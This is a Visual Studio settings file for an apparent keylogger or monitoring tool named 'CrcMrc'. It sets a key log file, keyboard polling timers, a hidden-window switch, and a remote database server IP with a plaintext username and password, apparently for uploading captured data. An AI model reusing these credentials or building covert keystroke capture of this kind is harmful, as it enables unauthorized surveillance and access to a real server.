<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" GeneratedClassNamespace="CrcMrc.Properties" GeneratedClassName="Settings">
  <Profiles />
  <Settings>
    <Setting Name="TickTime" Type="System.Int32" Scope="Application">
      <Value Profile="(Default)">9000</Value>
    </Setting>
    <Setting Name="ComputerName" Type="System.String" Scope="Application">
      <Value Profile="(Default)">none</Value>
    </Setting>
    <Setting Name="ComputerIP" Type="System.String" Scope="Application">
      <Value Profile="(Default)">none</Value>
    </Setting>
    <Setting Name="ComputerLocation" Type="System.String" Scope="Application">
      <Value Profile="(Default)">none</Value>
    </Setting>
    <Setting Name="FileName" Type="System.String" Scope="Application">
      <Value Profile="(Default)">KeyLog.txt</Value>
    </Setting>
    <Setting Name="TickKeyboardTime" Type="System.Int32" Scope="Application">
      <Value Profile="(Default)">400</Value>
    </Setting>
    <Setting Name="CounterKey" Type="System.Int32" Scope="Application">
      <Value Profile="(Default)">300</Value>
    </Setting>
    <Setting Name="dbServer" Type="System.String" Scope="Application">
      <Value Profile="(Default)">159.69.113.252</Value>
    </Setting>
    <Setting Name="dbName" Type="System.String" Scope="Application">
      <Value Profile="(Default)">kapluspl_crc</Value>
    </Setting>
    <Setting Name="dbUser" Type="System.String" Scope="Application">
      <Value Profile="(Default)">maniac</Value>
    </Setting>
    <Setting Name="dbPsw" Type="System.String" Scope="Application">
      <Value Profile="(Default)">F3VA55TpNfsA</Value>
    </Setting>
    <Setting Name="dbTime" Description="clock for DB transaction" Type="System.Int32" Scope="Application">
      <Value Profile="(Default)">60000</Value>
    </Setting>
    <Setting Name="FileDB" Description="Important OFFline File" Type="System.String" Scope="Application">
      <Value Profile="(Default)">temp.xml</Value>
    </Setting>
    <Setting Name="FileLOG" Description="take to file command log" Type="System.String" Scope="Application">
      <Value Profile="(Default)">control.txt</Value>
    </Setting>
    <Setting Name="CPUUseSwitch" Description="use or not cpu use measure" Type="System.Boolean" Scope="Application">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="Log_KeyLogger" Description="Log file for keylogger evidence" Type="System.Boolean" Scope="Application">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="Log_Command" Description="Log file for command evidence" Type="System.Boolean" Scope="Application">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="AutoHide" Type="System.Boolean" Scope="Application">
      <Value Profile="(Default)">True</Value>
    </Setting>
  </Settings>
</SettingsFile>